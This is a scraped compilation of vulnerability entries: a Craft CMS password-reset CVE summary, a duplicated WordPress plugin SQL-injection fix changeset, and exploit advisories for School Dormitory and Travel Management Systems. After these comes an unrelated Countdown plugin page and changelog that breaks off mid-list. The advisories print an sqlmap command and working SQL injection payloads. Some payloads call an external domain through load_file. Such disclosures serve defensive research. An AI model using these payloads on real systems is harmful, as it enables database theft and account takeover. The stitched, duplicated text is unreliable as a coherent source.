Craft CMS through 3.7.36 allows a remote unauthenticated attacker, who knows at least one valid username, to reset the account's password and take over the account by providing a crafted HTTP header to the application while using the password reset functionality. Specifically, the attacker must send X-Forwarded-Host to the /index.php?p=admin/actions/users/send-password-reset-email URI. NOTE: the vendor's position is that a customer can already work around this by adjusting the configuration (i.e., by not using the default configuration).

CVE-2022-29933: cms/CHANGELOG.md at develop · craftcms/cms

The Order Listener for WooCommerce WordPress plugin before 3.2.2 does not sanitise and escape the id parameter before using it in a SQL statement via a REST route available to unauthenticated users, leading to an SQL injection

Timestamp:

04/08/2022 10:17:35 PM (4 weeks ago)

pluginbazar

Message:

security fixed with $wpdb  

Location:

woc-order-alert/trunk

Files:

  

*   composer.lock
*   includes/class-hooks.php (2 diffs)
*   readme.txt (1 diff)
*   woc-order-alert.php (1 diff)

**Legend:**

Unmodified

Added

Removed

*   **woc-order-alert/trunk/includes/class-hooks.php**
    
    r2706677
    
    r2707223
    
     
    
    107
    
    107
    
                global $wpdb;
    
    108
    
    108
    
    109
    
     
    
                $all\_orders           = $wpdb->get\_results( "SELECT \* FROM " . OLISTENER\_DATA\_TABLE . " WHERE read\_status = 'unread'" );
    
     
    
    109
    
                $all\_orders           = $wpdb->get\_results(
    
     
    
    110
    
                    $wpdb->prepare( "SELECT \* FROM {$wpdb->prefix}woocommerce\_order\_listener WHERE read\_status = %s", 'unread' )
    
     
    
    111
    
                );
    
     
    
    112
    
                $all\_orders           = ! is\_array( $all\_orders ) ? array() : $all\_orders;
    
    110
    
    113
    
                $order\_list\_items\_all = olistener()->get\_order\_list\_items();
    
    111
    
    114
    
                $order\_list\_items     = olistener()->get\_option( 'olistener\_order\_list\_items', array\_keys( $order\_list\_items\_all ) );
    
    …
    
    …
    
     
    
    192
    
    195
    
    193
    
    196
    
                    $order\_total  = sanitize\_text\_field( olistener()->get\_args\_option( 'total', '', $json\_params ) );
    
    194
    
     
    
                    $all\_orders   = $wpdb->get\_results( "SELECT \* FROM " . OLISTENER\_DATA\_TABLE . " WHERE \`order\_id\` = $order\_id AND \`order\_total\` = $order\_total" );
    
     
    
    197
    
                    $all\_orders   = $wpdb->get\_results(
    
     
    
    198
    
                        $wpdb->prepare( "SELECT \* FROM {$wpdb->prefix}woocommerce\_order\_listener WHERE order\_id = %d", $order\_id )
    
     
    
    199
    
                    );
    
     
    
    200
    
                    $all\_orders   = ! is\_array( $all\_orders ) ? array() : $all\_orders;
    
    195
    
    201
    
                    $latest\_order = end( $all\_orders );
    
    196
    
    202
    
                    $order\_args   = array(
    
*   **woc-order-alert/trunk/readme.txt**
    
    r2706677
    
    r2707223
    
     
    
    7
    
    7
    
        Tested up to: 5.9.3
    
    8
    
    8
    
        Tested up to WooCommerce: 6.3.1
    
    9
    
     
    
        Stable tag: 3.2.0
    
     
    
    9
    
        Stable tag: 3.2.2
    
    10
    
    10
    
        License: GPLv2 or later
    
    11
    
    11
    
        License URI: http://www.gnu.org/licenses/gpl-2.0.html
    
*   **woc-order-alert/trunk/woc-order-alert.php**
    
    r2706677
    
    r2707223
    
     
    
    4
    
    4
    
        Plugin URI: https://pluginbazar.com/
    
    5
    
    5
    
        Description: Play sound as notification instantly on new order in your WooCommerce store
    
    6
    
     
    
        Version: 3.2.1
    
     
    
    6
    
        Version: 3.2.2
    
    7
    
    7
    
        Author: Pluginbazar
    
    8
    
    8
    
        Author URI: https://pluginbazar.com/
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2022-0948: Changeset 2707223 – WordPress Plugin Repository

Timestamp:

04/08/2022 10:17:35 PM (6 weeks ago)

pluginbazar

Message:

security fixed with $wpdb  

Location:

woc-order-alert/trunk

Files:

  

*   composer.lock
*   includes/class-hooks.php (2 diffs)
*   readme.txt (1 diff)
*   woc-order-alert.php (1 diff)

**Legend:**

Unmodified

Added

Removed

*   **woc-order-alert/trunk/includes/class-hooks.php**
    
    r2706677
    
    r2707223
    
     
    
    107
    
    107
    
                global $wpdb;
    
    108
    
    108
    
    109
    
     
    
                $all\_orders           = $wpdb->get\_results( "SELECT \* FROM " . OLISTENER\_DATA\_TABLE . " WHERE read\_status = 'unread'" );
    
     
    
    109
    
                $all\_orders           = $wpdb->get\_results(
    
     
    
    110
    
                    $wpdb->prepare( "SELECT \* FROM {$wpdb->prefix}woocommerce\_order\_listener WHERE read\_status = %s", 'unread' )
    
     
    
    111
    
                );
    
     
    
    112
    
                $all\_orders           = ! is\_array( $all\_orders ) ? array() : $all\_orders;
    
    110
    
    113
    
                $order\_list\_items\_all = olistener()->get\_order\_list\_items();
    
    111
    
    114
    
                $order\_list\_items     = olistener()->get\_option( 'olistener\_order\_list\_items', array\_keys( $order\_list\_items\_all ) );
    
    …
    
    …
    
     
    
    192
    
    195
    
    193
    
    196
    
                    $order\_total  = sanitize\_text\_field( olistener()->get\_args\_option( 'total', '', $json\_params ) );
    
    194
    
     
    
                    $all\_orders   = $wpdb->get\_results( "SELECT \* FROM " . OLISTENER\_DATA\_TABLE . " WHERE \`order\_id\` = $order\_id AND \`order\_total\` = $order\_total" );
    
     
    
    197
    
                    $all\_orders   = $wpdb->get\_results(
    
     
    
    198
    
                        $wpdb->prepare( "SELECT \* FROM {$wpdb->prefix}woocommerce\_order\_listener WHERE order\_id = %d", $order\_id )
    
     
    
    199
    
                    );
    
     
    
    200
    
                    $all\_orders   = ! is\_array( $all\_orders ) ? array() : $all\_orders;
    
    195
    
    201
    
                    $latest\_order = end( $all\_orders );
    
    196
    
    202
    
                    $order\_args   = array(
    
*   **woc-order-alert/trunk/readme.txt**
    
    r2706677
    
    r2707223
    
     
    
    7
    
    7
    
        Tested up to: 5.9.3
    
    8
    
    8
    
        Tested up to WooCommerce: 6.3.1
    
    9
    
     
    
        Stable tag: 3.2.0
    
     
    
    9
    
        Stable tag: 3.2.2
    
    10
    
    10
    
        License: GPLv2 or later
    
    11
    
    11
    
        License URI: http://www.gnu.org/licenses/gpl-2.0.html
    
*   **woc-order-alert/trunk/woc-order-alert.php**
    
    r2706677
    
    r2707223
    
     
    
    4
    
    4
    
        Plugin URI: https://pluginbazar.com/
    
    5
    
    5
    
        Description: Play sound as notification instantly on new order in your WooCommerce store
    
    6
    
     
    
        Version: 3.2.1
    
     
    
    6
    
        Version: 3.2.2
    
    7
    
    7
    
        Author: Pluginbazar
    
    8
    
    8
    
        Author URI: https://pluginbazar.com/
    

**Note:** See TracChangeset for help on using the changeset viewer.

School Dormitory Management System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: School Dormitory Management System - 'month' SQL Injection# Date: 08/05/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html# Version: 1.0# Tested on: XAMPP, Linux# Vulnerable Codeline 59 in file "/dms/admin/reports/daily_collection_report.php"$qry = $conn->query("SELECT p.*, a.code, s.code as student_code, concat(s.firstname, ' ', coalesce(concat(s.middlename,' '), ''), s.lastname) as `student`, d.name as dorm, r.name as `room` from payment_list p inner join account_list a on p.account_id = a.id inner join student_list s on a.student_id = s.id inner join room_list r on a.room_id = r.id inner join dorm_list d on r.dorm_id = d.id where (p.month_of) = '{$month}' order by student asc ");# Sqlmap command:sqlmap -u "http://localhost/dms/admin/?month=1&page=reports/daily_collection_report" -p month --level=5 --risk=3 --dbs --random-agent --eta# Output:Parameter: month (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: month=1' AND (SELECT 3271 FROM (SELECT(SLEEP(5)))duQT) AND 'NgBP'='NgBP&page=reports/daily_collection_report    Type: UNION query    Title: Generic UNION query (NULL) - 11 columns    Payload: month=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626b6a71,0x485362486f7266597a444d417754744873427366706c4a4f706b7949467a6a61505468424c476753,0x716b6a7171),NULL,NULL,NULL,NULL-- -&page=reports/daily_collection_report

School Dormitory Management System 1.0 SQL Injection

School Dormitory Management version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: School Dormitory Management 1.0 SQLi## Author: nu11secur1ty## Date: 05.09.2022## Vendor: https://www.sourcecodester.com/users/tips23## Software: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/School-Dormitory-Management## Description:The id parameter appears to be vulnerable to SQL injection attacks.A single quote was submitted in the id parameter, and a database errormessage was returned.Two single quotes were then submitted and the error message disappeared.The attacker can take administrator accounts control and also of allaccounts on this system, also the malicious user can download allinformation about this system.Status: CRITICAL[+] Payloads:```mysql---Parameter: id (POST)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: id=2' AND (SELECT 7198 FROM(SELECTCOUNT(*),CONCAT(0x716b7a6a71,(SELECT(ELT(7198=7198,1))),0x7170717171,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# JPhD    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=2' AND (SELECT 6966 FROM (SELECT(SLEEP(5)))amnS)# UIgv---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/School-Dormitory-Management)## Proof and Exploit:[href](https://streamable.com/hd6xo1)

School Dormitory Management 1.0 SQL Injection

Travel Management System version 1.0 suffers from multiple remote SQL injection vulnerabilities. Original discovery of SQL injection in this version is attributed to Bobby Cooke and hyd3sec in August of 2020.

    ## Title: Travel Management System 1.0 Multiple SQLi## Author: nu11secur1ty## Date: 05.07.2022## Vendor: https://code-projects.org/author/fabian/## Software: https://code-projects.org/travel-management-system-using-php-source-code/## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-28079## Description:The pid, subcatid and catid parameters appear to be vulnerable to SQLinjection attacks.The payload '+(selectload_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+'was submitted in the all parameters.This payload injects a SQL sub-queries that call MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The application interacted with that domain, indicating that theinjected SQL query was executed.The attacker can take administrator accounts control and also of allaccounts on this system, also the malicious user can download allinformation about this system.Status: CRITICAL[+] Payloads:```mysql---Parameter: pid (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: pid=12'+(selectload_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+''OR NOT 1485=1485 AND 'nTcz'='nTcz    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: pid=12'+(selectload_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+''OR (SELECT 7369 FROM(SELECT COUNT(*),CONCAT(0x716b767671,(SELECT(ELT(7369=7369,1))),0x717a6b7871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OIAM'='OIAM    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: pid=12'+(selectload_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+''AND (SELECT 4768 FROM (SELECT(SLEEP(5)))llcY) AND 'EiGX'='EiGX    Type: UNION query    Title: MySQL UNION query (NULL) - 4 columns    Payload: pid=12'+(selectload_file('\\\\sc8xrq6pkgxzxgwiy0hepo3sgjmca2yt1hs4is7.tapak.com\\fez'))+''UNION ALL SELECTNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b767671,0x5a716d6f4e64696f557a4d784663766d435a634a6d4d434b4b477057454a537a45516d445a77767a,0x717a6b7871),NULL,NULL,NULL#---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Parameter: subcatid (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause    Payload: subcatid=-4598' OR 9251=9251 AND 'kzhS'='kzhS    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: subcatid=7'+(selectload_file('\\\\oogt3milwc9v9c8eawta1kfosfy8m6axdl48uwj.subcatid-tapak.com\\txz'))+''AND (SELECT 2330 FROM(SELECT COUNT(*),CONCAT(0x717a7a7871,(SELECT(ELT(2330=2330,1))),0x716a6b7a71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Qftm'='Qftm    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: subcatid=7'+(selectload_file('\\\\oogt3milwc9v9c8eawta1kfosfy8m6axdl48uwj.subcatid-tapak.com\\txz'))+''AND (SELECT 2506 FROM (SELECT(SLEEP(5)))yVKW) AND 'QRSS'='QRSS    Type: UNION query    Title: MySQL UNION query (NULL) - 4 columns    Payload: subcatid=7'+(selectload_file('\\\\oogt3milwc9v9c8eawta1kfosfy8m6axdl48uwj.subcatid-tapak.com\\txz'))+''UNION ALL SELECTNULL,NULL,NULL,NULL,NULL,CONCAT(0x717a7a7871,0x4142654745746c4c54786a476756684b7864575669645759754f694d5671586a51506a474a475652,0x716a6b7a71),NULL,NULL,NULL#----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------Parameter: catid (GET)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause    Payload: catid=-9719' OR 2503=2503 AND 'ydxn'='ydxn    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: catid=3'+(selectload_file('\\\\wee1tu8tmkz3zkym04jirs5winogc80z3nuaky9.catidtapak.com\\hwa'))+''AND (SELECT 9602 FROM(SELECT COUNT(*),CONCAT(0x71786b6a71,(SELECT(ELT(9602=9602,1))),0x7170626b71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xPSh'='xPSh    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: catid=3'+(selectload_file('\\\\wee1tu8tmkz3zkym04jirs5winogc80z3nuaky9.catidtapak.com\\hwa'))+''AND (SELECT 1843 FROM (SELECT(SLEEP(5)))XNBw) AND 'KRBS'='KRBS    Type: UNION query    Title: MySQL UNION query (NULL) - 4 columns    Payload: catid=3'+(selectload_file('\\\\wee1tu8tmkz3zkym04jirs5winogc80z3nuaky9.catidtapak.com\\hwa'))+''UNION ALL SELECTNULL,CONCAT(0x71786b6a71,0x62596c6a72746a584a7048484a70435867556a656d6e5a734474725650477853527466545071436a,0x7170626b71),NULL,NULL,NULL#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/Travel-Management-System)## Proof and Exploit:[href](https://streamable.com/8nroqp)

Travel Management System 1.0 SQL Injection

Pro Features Lock Bypass vulnerability in Countdown & Clock plugin <= 2.3.2 at WordPress.

*   Details
*   Reviews
*   Installation
*   Development

Countdown builder – Customizable Countdown Timer  
A very simple plugin to add **countdown** timer to your website.  
**Countdown** timer allow you to create nice and functional Countdown timer just in a few minutes.  
This is the best way to create beautiful **Countdown** for your users.  
You can use our Countdown timer in your posts/pages via shortcode example like this  
\[ycd\_countdown id=73\]

Countdown types

*   Circle Countdown
*   Digital
*   Timer Countdown
*   Clock 1
*   Clock 2
*   Clock 3
*   Clock 4
*   Clock 5
*   Clock 6
*   Clock 7
*   Simple countdown
*   Sticky Countdown
*   Circle countdown & popup
*   Flipclock countdown
*   Flipclock countdown & popup
*   WooCommerce countdown
*   WooCommerce coupons
*   Coming Soon page

How to create Countdown example

We do web development and if you need a developer or if you think you have found a bug in Read more plugin, if you have any question, please feel free to contact us by this email adamskaat1@gmail.com.

1.  Upload the ‘Countdown’ plugin folder to the ‘/wp-content/plugins/’ directory.
2.  Activate the “countdown-builder” list plugin through the ‘Plugins’ menu in WordPress.
3.  Check the Countdowns Menu button and start adding Countdown.

**How can I insert it into my pages/posts**

After you installed the plugin you can go to your pages/posts and just click on our plugin shortcode button and add it to your pages/posts.

Yes you can, we have Circle and Flipclock countdown popups.

**What files I need to upload for installing the plugin**

You need to select the .zip file, there is no need to extract the zip file, just upload it.

I am a web designer and marketer from Bulgaria. I have been working in these specialties for 20 years now, and I have enough experience to determine the professional level of any Internet software creator, as well as their efficiency, responsiveness and honesty. I am extremely happy to find not only the 'Countdown & Clock' software, but also the manufacturing company. If there were more such manufacturers, the world would be a paradise for people from every country. I thank them. Toni

Es justo lo que necesitaba

I wanted a simple way to count down various milestones in my journey and this plugin was perfect for me. It's very easy to use and has plenty of customizations, even without paying anything.

Easy to install, easy to use, works perfectly well.

So simple and helpful plugin! Thank you so much!

Read all 162 reviews

“Countdown, Coming Soon, Maintenance – Countdown & Clock” is open source software. The following people have contributed to this plugin.

Contributors

*    adamskaat

**2.5.8**

*   Added Countdown Expiration WooCommerce Condition “The cart will not empty the countdown”

**2.5.7**

*   Added Simple countdown translation
*   Added disable google fonts option

**2.5.6**

*   Changed the default value of the Countdown Expiration WooCommerce Condition
*   Fixed PHP warnings

**2.5.5**

*   Fixed flip clock popup open onload
*   Added info tooltip text to describe feature

**2.5.4**

*   Added display rules post categories detection
*   Improved display rules WooCommerce label
*   Added display rules for all custom posts categories detection
*   Added display rile for WooCommerce Shop page detection
*   Added display rile for WooCommerce Cart page detection
*   Added display rile for WooCommerce Account page detection

**2.5.3**

*   Added Countdown fixed position

**2.5.2**

*   Added Sticky Countdown ” Enable sticky footer ” option
*   Added WooCommerce Number of products sold
*   Fixed WooCommerce coupon date issue

**2.5.1**

*   Added WooCommerce Number of products less than
*   Added WooCommerce Number of products more than
*   Code improvement

**2.5.0**

*   Added display rule All tags
*   Added display rule Selected tags
*   Admin panel UI improvements
*   Fixed Display rule pages search
*   Minor bug fixes and improvements

**2.4.9**

*   Added Countdown Expiration WooCommerce Condition (Stock is empty)
*   Added Countdown Expiration WooCommerce Condition (Stock is not empty)
*   Improved general options section
*   Improved Display rule condition

**2.4.8**

*   Fixed Simple countdown expiration default behavior
*   Fixed Simple countdown timer preview issue during duration change

**2.4.7**

*   Fixed Countdown translation warnings
*   Improved Display Rules section
*   Added page type Home, Posts, Search, 404, Archive

**2.4.6**

*   Fixed coming soon mode option
*   Fixed coming soon page render html tags issue

**2.4.5**

*   Added Display Rules new section
*   Added possibility to from settings include (Timer Countdown, Clock 1, Clock 2, Clock 3, Clock 4, Clock 5, Clock 6, Clock 7) types
*   Added New feature suggestion request section
*   Fixed some warnings

**2.4.4**

*   Countdown Admin panel fixes

**2.4.3**

*   Added possibility to translate the circle countdown texts related to browser language.

**2.4.2**

*   Sticky Countdown Double Digits option

**2.4.1**

*   Added Years possibility to simple countdown

**2.4.0**

*   Fixed Clock1 options
*   Fixed Clock2 options
*   Fixed Clock3 options
*   Fixed Coming Soon options
*   Fixed Countdown button options
*   Bug fixed types section

**2.3.5**

*   Fixed moment js file

**2.3.4**

*   Code fixes

**2.3.3**

*   Code fixes

**2.3.2**

*   Added Simple countdown numbers margin
*   Added Simple countdown text margin

**2.3.1**

*   Simple countdown added Text to top (new)
*   Sticky countdown close button text position change possibility (new)

**2.3.0**

*   Added compatibility with Polylang

**2.2.9.2**

*   Fixed Display on save issue

**2.2.9.1**

*   Fixed some warnings
*   Fixed issue on PHP 8
*   Code improvement

**2.2.9**

*   Security improvement
*   Fixed onclick Countdown popup issue

**2.2.8**

*   Fixed Simple countdown save duration option
*   Fixed Sticky countdown save duration option
*   Fixed countdown preview box height limitation issue

**2.2.7**

*   Hide Editor Media buttons (new settings)
*   Settings options save improvement

**2.2.6**

*   Added Enable date for the timers

**2.2.5**

*   Fixed simple countdown countUp issue
*   Fixed Days durations limitation

**2.2.4**

*   Added Countdown Enable start date (New)
*   Added Clocks Background color change possibility.
*   Fixed Security issue during countdowns clone

**2.2.3**

*   Bug fixed of the Countdown Gutenberg block
*   Countdown Gutenberg block improvements

**2.2.2**

*   Added Custom font family functionality
*   Fixed the progress bar color change issue
*   Fixed the progress bar percentage calculation issue
*   Fixed schedules date calculation with simple countdown type

**2.2.1**

*   Fixed Change countdown before text after expiration saving issue
*   Fixed Change countdown before text before expiration saving issue

**2.2.0**

*   Fixed debricated function and compatible with the PHP 8

**2.1.9**

*   Fixed Change countdown before text after expiration during count up
*   Fixed Change countdown after text after expiration during count up
*   Fixed coming soon warnings

**2.1.8**

*   Change countdown before text after expiration
*   Change countdown after text after expiration

**2.1.7**

*   Upcoming Day Of Week (Recurring) (New Feature)

**2.1.6.1**

*   Time zone bug fixed

**2.1.6**

*   Time zone per user functionality

**2.1.5**

*   Sticky Countdown Button close banner behavior
*   Sticky countdown admin side improvement

**2.1.4**

*   Sticky button copy alert after copy

**2.1.3**

*   Added possibility via Sticky countdown button copy text

**2.1.2**

*   Added security for settings save
*   Support menu fixed

**2.1.1**

*   Fixed simple countdown date calculation issue
*   Fixed schedule issue

**2.1.0**

*   Added simple countdown months new time unite

**2.0.9**

*   Fixed Display on option save issue on PHP 8
*   Fixed Coming Soon issue for logged in users on PHP 8
*   Duration live preview issue Circle and Simple countdowns

**2.0.8**

*   Coming soon Automatically start by date
*   Coming soon Automatically expire by date
*   Coming soon admin section improvement

**2.0.7**

*   Added possibility add shortcode inside Coming soon page content
*   Fixed added slashes issue in coming soon page content
*   Added random number plugin to more plugins section

**2.0.6**

*   Fixed Simple Countdown tyoe count up functionality

**2.0.5**

*   Fixed Simple Countdown type after expiration issue
*   Fixed Simple Countdown type responsiveness issue
*   Fixed Admin side live preview box dragable issue
*   Fixed Simple Countdown And Subscription type issue
*   Fixed Simple Countdown type dots font size issue

**2.0.4**

*   Multiple Simple countdowns dates confilict fixed

**2.0.3**

*   Simple countdown double digits

**2.0.2**

*   Simple countdown live preview labels on/off issue fixed
*   Code improvement related to WordPress 5.7

**2.0.1**

*   Simple countdown display on pages option fixed

**2.0.0**

*   Nav bar on the Countdown types section
*   Show on selected user roles (Coming Soon option)
*   Schedule 1 option bug fixed
*   Code optimization
*   Code clean up

**1.9.9**

*   Fixed countdown activation issue
*   Fixed circle countdown
*   Countdown admin panel options label typo fixes

**1.9.8**

*   Simple countdown Numbers Color
*   Simple countdown Labels Color
*   Simple countdown Numbers Font Family
*   Simple countdown Labels Font Family
*   Admin side improvements

**1.9.7**

*   Fixed simple countdown issue on Safari browser

**1.9.6**

*   Simple countdown numbers font size
*   Simple countdown labels font size

**1.9.5**

*   Simple Countdown type live preview improvement
*   Fixed Sticky Countdown issue on Iphone devices
*   Improved Date Time Picker

**1.9.4**

*   Simple countdown new type

**1.9.3**

*   Added ‘ Print scripts to the page ‘ option in the Setting section
*   WordPress 5.6 version full support

**1.9.2**

*   Added possibility close Sticky Countdown
*   Added possibility to change Sticky Countdown close text
*   Admin side type sections improvement

**1.9.1**

*   Sticky Countdown Sections Order

**1.9.0**

*   Inside Sticky Countdown type, added possibility select another countdown type to show countdown
*   Coming Soon type code improvements

**1.8.9**

*   Added Demo website
*   Improved deactivation survey
*   Fixed Timer countdown buttons issue
*   Schedule countdown bug fixed
*   Sticky countdown bug fixed

**1.8.8**

*   Deactivation survey

**1.8.7**

*   Create default countdown after the first activation
*   Bug fixes

**1.8.6**

*   Timer Before HTML
*   Timer After HTML
*   Compatibility test with WordPress 5.5 version

**1.8.5**

*   Countdown Widget Title Change
*   Countdown Settings Save Message
*   Coming Soon setting Save Message

**1.8.4**

*   Moment js lib customization and prevent conflict with other plugins
*   Colors Rgba possibility
*   Coming soon IP whitelist feature
*   Code improvements

**1.8.3**

*   Sticky Countdown expiration time bug fixed
*   After activation redirect to plugin menu section
*   Countdowns types section improvement

**1.8.2**

*   Timer countdown enable labels
*   Timer countdown labels font size

**1.8.1**

*   Sticky countdown button redirect to new tab option

**1.8.0**

*   Add sticky countdown to version
*   WooCommerce coupon integration

**1.7.9**

*   Admin side fixed Warnings

**1.7.8**

*   Admin side improvements

**1.7.7**

*   Circle time extension
*   Admin side hide coming soon menu setting
*   Admin side info metabox
*   Sticky countdown type improvements
*   WooCommerce countdown type improvements
*   Bug fixes

**1.7.6**

*   Countdown Clone (new)
*   Coming Soon Custom JS (new)
*   Coming Soon Custom CSS (new)
*   Circle Timer (coming soon)

**1.7.5**

*   New Maintenance mode (new)
*   Timer days option (new)
*   Support metabox coming soon section
*   Bug fixes

**1.7.4**

*   Timer start button Custom class name (new)
*   Timer reset button Custom class name (new)
*   Timer AutoPlay after restart (new)

**1.7.3**

*   Fixed Saved duration issue related to Days
*   Reset duration (new)

**1.7.2**

*   Countdown timer milliseconds (new)

**1.7.1**

*   Add duration Days option (new)
*   Schedule 2 (new)
*   Admin side improvement

**1.7.0**

*   Save Duration For Each User (new)
*   Admin Side Is Expired Bug Fixed
*   Circle Countdown Popup Saving Issue Fixed
*   Bug Fixed Related To Schedule Countdown

**1.6.9**

*   Save Duration (new)
*   Code optimization

**1.6.8**

*   Circle countdown text margin top (new)
*   Circle countdown numbers margin top (new)
*   Coming Soon Background Video (new)

**1.6.7**

*   Countdown Shortcode metabox (new)
*   Admin Design improvement

**1.6.6**

*   Circle Countdown switch Number And Text (new)

**1.6.5**

*   Coming Soon add Countdown (new)
*   Coming Soon Headline Color (new)
*   Coming Soon Message Color (new)
*   Coming Soon Font Family (new)

**1.6.4**

*   Coming Soon new menu type(new)
*   Coming Soon background color(new)
*   Coming Soon background image(new)
*   Count up bug fixed

**1.6.3**

*   Coming Soon Header Title (new)
*   Coming Soon SEO Meta Description (new)
*   Coming Soon Favicon (new)

**1.6.2**

*   Coming Soon Page (new)

**1.6.1**

*   Shortcode Date attribute \[ycd\_countdown id=63 date=”2019-11-25 22:25″\]
*   JS custom trigger YcdExpired

**1.6.0**

*   Due date bug fixed
*   New Video tutorials section
*   Countdown Number Styles Font Size option improvement

**1.5.9**

*   Countdowns table copy shortcode
*   New Ideas sub menu
*   Admin side improvements
*   Countdown Button new features and video example
*   Bug fixed

**1.5.8**

*   Custom JS (new)
*   Circle countdown Redirect to new tab (new)
*   Countdown button new options
*   Bug fixed

**1.5.7**

*   Font load issue
*   Countdown button extension
*   Code optimization

**1.5.6**

*   Count up from End Date (new)
*   Admin panel improvements

**1.5.5**

*   More plugins section
*   Count Up option save bug fixed

**1.5.4**

*   Code improvement (added new actions and triggers)
*   Analytic Extension
*   Bug fixed

**1.5.3**

*   Timer reset button
*   Timer buttons colors customization
*   Circle countdown popup on load event
*   Flipclock countdown popup on load event

**1.5.2**

*   Enable Timer Button (new)
*   Enable/Disable auto counting
*   Timer button start label
*   Timer button stop label

**1.5.1**

*   Display countdown on all custom post
*   Display countdown on selected custom post
*   Code optimization
*   Backend functions improvement
*   Bug fixed

**1.5.0**

*   Clock 3 type improvement
*   Bug fixed

**1.4.9**

*   Clock mode (12h/24h)
*   But fixed

**1.4.8**

*   After expire behavior for the Clock1, Clock2, Clock3, Clock4, Clock5, Clock6, Clock7 timers

**1.4.7**

*   New timer feature for the Clock1, Clock2, Clock3, Clock4, Clock5, Clock6, Clock7
*   Bug fixed

**1.4.6**

*   Display Countdown to Everywhere automatically (new feature)
*   Circle Countdown responsiveness improvement

**1.4.5**

*   Countdown Showing Limitation (new feature)
*   Countdown Showing Animation (new feature)
*   Countdown Shadow (new feature)
*   Code optimization
*   Small bug fixed

**1.4.3**

*   After Countdown Expire: Count Up (new feature)
*   Countdown responsiveness improvement
*   Bug fixed

**1.4.2**

*   New custom Css code possibility
*   Features improvements
*   Code improvements

**1.4.1**

*   Before Circle countdown content (new feature)
*   After Circle countdown content (new feature)
*   bug fixed

**1.4.0.1**

*   Improve Countdown Support menu link
*   Change countdown menu title to Countdown & Clock
*   minor improvement

**1.4.0**

*   Live preview draggable and toggle improvement
*   Clock 1 new improvements
*   Clock 2 new improvements
*   Clock 3 new improvements
*   Clock 4 new improvements
*   Clock 5 new improvements
*   Clock 6 new improvements
*   Clock 7 new improvements
*   Minor bug fixed

**1.3.9**

*   Clock 1 colors customizations
*   Shortcode media button conflict fixed
*   Admin side bug fixed
*   Descriptions improvement

**1.3.8**

*   New progress bar option
*   Admin side text improvement
*   Bug fixed

**1.3.7**

*   Admin side improvement
*   Bug fixed

**1.3.6**

*   Gutenberg block (new)
*   HTML editor countdown button (new)
*   Schedule (new)
*   Backend side improvement
*   Bug fixed

**1.3.5**

*   Bug Fixed

**1.3.4**

*   Countdown date duration option(new)
*   WooCommerce Countdown (new)
*   Countdown create bug fixed
*   Countdown issue on iPhone
*   Code improvement

**1.3.3**

*   Circle countdown months and year support
*   Time zone change issue on the Internet Explorer
*   Sticky countdown type (new)
*   Countdowns table improvement
*   Code improvement

**1.3.2**

*   Added new clock 2 types (new)
*   Code optimization
*   Bug fixed

**1.3.1**

*   Add new type clock
*   Code improvement

**1.3.0**

*   Fixed possibility multiple timer on the same page

**1.2.9**

*   Newsletter (new)
*   Countdown number Font Size (new)
*   Countdown number Font Weight (new)
*   Countdown number Font Style (new)
*   Countdown number Font Family (new)
*   Video tutorial https://www.youtube.com/watch?v=efqVcdKF620
*   Bug fixed
*   Code fixes

**1.2.8**

*   Circle Countdown type text Font Style (new option)
*   Bug fixed

**1.2.7**

*   New Digital countdown type
*   Bug fixed
*   Code improvement

**1.2.6**

*   Fixed Compatibility with cache plugins
*   Bug fixed

**1.2.5**

*   Code optimization
*   Admin dashboard improvement
*   Flip Clock popup type PRO

**1.2.4**

